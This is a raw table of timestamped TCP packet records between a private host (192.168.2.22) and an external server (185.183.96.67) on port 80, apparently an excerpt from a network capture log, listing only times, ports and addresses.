Sep 27, 2021 21:19:49.725263119 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725311041 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725318909 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725358009 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725369930 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725400925 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725402117 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.725441933 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.725847006 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.743869066 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.743913889 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.743952036 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.743987083 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.744018078 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.744069099 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.746150970 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.751621962 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.751745939 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.751801014 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.751910925 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.751952887 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.751965046 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.751993895 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752026081 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752038956 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752057076 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752068996 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752089977 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752091885 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752127886 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752127886 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752161980 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752168894 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752193928 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752203941 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752226114 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752520084 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752538919 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752583027 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752589941 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752615929 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752625942 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752655029 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752664089 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752720118 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752865076 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752882957 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752897978 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.752928972 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752939939 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752943993 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.752990961 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753031015 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753056049 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753093004 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753129959 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753145933 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753169060 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753199100 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753211021 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753230095 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753247976 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753264904 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753283978 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753299952 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753300905 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753314972 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753334045 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753396988 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753413916 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753432989 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753437042 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753448963 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753452063 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.753465891 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.753482103 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.756108046 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.772392988 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.772453070 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.772614956 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791507006 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791568995 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791610956 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791650057 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791687965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791713953 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791729927 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791769028 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791773081 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791774988 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791779041 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791809082 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791821957 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791851044 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791855097 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791857004 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791893959 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791910887 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791934967 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.791954041 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.791975975 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792012930 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792025089 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792030096 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792083025 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792083025 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792125940 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792140007 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792167902 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792182922 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792208910 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792226076 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792248964 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792288065 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792325974 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792329073 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792335033 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792366982 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792376041 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792382002 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792418957 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792433023 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792459965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.792476892 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.792521000 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.800244093 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.800401926 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.819703102 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.819902897 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837106943 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837155104 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837193966 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837232113 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837292910 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837338924 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837424040 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837456942 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837462902 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837485075 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837502956 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837512016 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837555885 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837557077 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837595940 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837601900 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837635994 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837636948 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837677002 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837677956 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837714911 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837716103 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837754965 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837847948 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837888002 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837897062 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837929964 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.837929964 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.837970972 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.847780943 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.847877979 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.847949982 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.847985029 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.847990036 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848031998 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848031998 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848071098 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848073959 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848140955 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848247051 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848289013 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848319054 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848356962 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848398924 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848439932 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848489046 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848529100 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848531961 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848568916 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848588943 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848628998 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848629951 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848669052 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848669052 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848707914 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848725080 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848762989 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848767042 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848802090 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.848804951 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.848841906 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868007898 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868155956 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868197918 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868221998 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868237019 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868257046 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868262053 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868288040 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868329048 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868372917 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.868386030 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.868427038 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.869790077 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.871229887 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885479927 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885521889 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885560989 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885608912 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885648966 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885653019 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885679960 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885693073 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885698080 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885734081 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885741949 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885775089 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885787010 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885813951 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885813951 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885854959 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885857105 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885894060 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885895014 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885934114 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.885942936 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.885988951 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.886015892 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.886059999 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.887454987 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.895975113 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896024942 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896068096 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896157980 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896229029 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896262884 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896272898 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896285057 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896311998 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896351099 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896425009 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896456003 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896466017 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896466970 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896505117 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896544933 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896600008 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896753073 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896801949 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896817923 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896840096 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.896841049 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.896878958 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.898330927 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930619955 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930674076 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930718899 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930758953 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930794954 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930800915 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930829048 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930835009 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930849075 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930879116 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930919886 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930924892 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.930958033 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.930964947 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931005001 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931042910 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931087017 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931091070 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931149006 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931209087 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931252003 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931281090 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931291103 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931293964 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931330919 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931333065 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931372881 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931374073 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931415081 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931466103 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931509972 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931515932 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931529045 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931545973 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931550980 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931592941 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931592941 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931637049 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931638002 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931675911 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931677103 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931716919 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931716919 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931759119 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931760073 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931808949 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931824923 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931849003 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.931854010 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.931936026 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932118893 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932182074 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932220936 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932277918 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932323933 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932337999 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932362080 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932364941 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932405949 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932410002 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932446957 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932451963 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932487965 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932487965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932533979 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932538986 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932584047 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932585955 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932626009 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.932630062 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.932671070 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.936677933 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975245953 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.975430965 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.975461960 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.975476027 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975497007 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975528002 CEST	49166	80	192.168.2.22	185.183.96.67
Sep 27, 2021 21:19:49.975574017 CEST	80	49166	185.183.96.67	192.168.2.22
Sep 27, 2021 21:19:49.975598097 CEST	80	49166	185.183.96.67	192.168.2.22
